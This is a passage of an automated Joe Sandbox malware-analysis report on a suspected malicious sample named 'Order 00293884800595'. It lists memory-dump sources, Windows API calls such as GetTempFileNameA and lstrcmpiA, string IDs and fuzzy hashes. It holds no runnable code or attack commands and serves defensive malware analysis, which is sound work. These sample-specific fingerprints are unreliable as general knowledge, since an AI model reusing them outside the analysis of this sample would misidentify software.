                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                                  • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                                  • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                                  • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405E63
                                                  • GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                  • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                                  • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                  • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q
                                                  • API String ID: 0-2080730351
                                                  • Opcode ID: 0a9325a1664eb7f6c27b928f918ed4fdd03e6c9112e5353bbafe346c9d25148d
                                                  • Instruction ID: 9eba4a6b718509388165fb3951a5d6cc2867b892327821c2d20893fcfe8b2369
                                                  • Opcode Fuzzy Hash: 0a9325a1664eb7f6c27b928f918ed4fdd03e6c9112e5353bbafe346c9d25148d
                                                  • Instruction Fuzzy Hash: 41B14C74A00608CBEB14DFA5C594A9EB7B3FF88301F258929D416EB355DBB4DC86CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR~q$LR~q$$~q$$~q
                                                  • API String ID: 0-97351441
                                                  • Opcode ID: 25ce1e4fb9552ad0f46cfffc9ba0c050204ce7bbab368d5d14b7c29ded4dee4d
                                                  • Instruction ID: 46ffd7574b791e7ee5f9dd3dce4ead012cfb41669fb9aace16f27e5f3088b4c2
                                                  • Opcode Fuzzy Hash: 25ce1e4fb9552ad0f46cfffc9ba0c050204ce7bbab368d5d14b7c29ded4dee4d
                                                  • Instruction Fuzzy Hash: CE51DF34B00606DFDF08DB69C959A6AB7E7FF89300F108969E4129B395DBB0EC01CB94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q
                                                  • API String ID: 0-2080730351
                                                  • Opcode ID: acccd79a36c6b9e391f97d67f5a571ceb446be2f99fe86aee6968a32e51ff813
                                                  • Instruction ID: 8f316af96b5486b6c712a242620bb8fcdbe53ad26213836f16a4ab96fe308c55
                                                  • Opcode Fuzzy Hash: acccd79a36c6b9e391f97d67f5a571ceb446be2f99fe86aee6968a32e51ff813
                                                  • Instruction Fuzzy Hash: C5519E78B00208CBDF15EBA5D590A9EB7B2FB88351F508929D806EB344DB71EC42CBC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q
                                                  • API String ID: 0-2080730351
                                                  • Opcode ID: e1b9aba96fa56e96e034178a85ad0927394bcedc036d6cbb2fe65da8120ab7f5
                                                  • Instruction ID: cb973affbac3077d96194f788441a0034ee097015231698a1f77c3ba5a2a247d
                                                  • Opcode Fuzzy Hash: e1b9aba96fa56e96e034178a85ad0927394bcedc036d6cbb2fe65da8120ab7f5
                                                  • Instruction Fuzzy Hash: A5418D78B00218CBDF15EBA5D590A9DB3B2FB88352F148929D8069B349DBB1DC46CB84
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                                  • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                  • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                                  • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                  • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C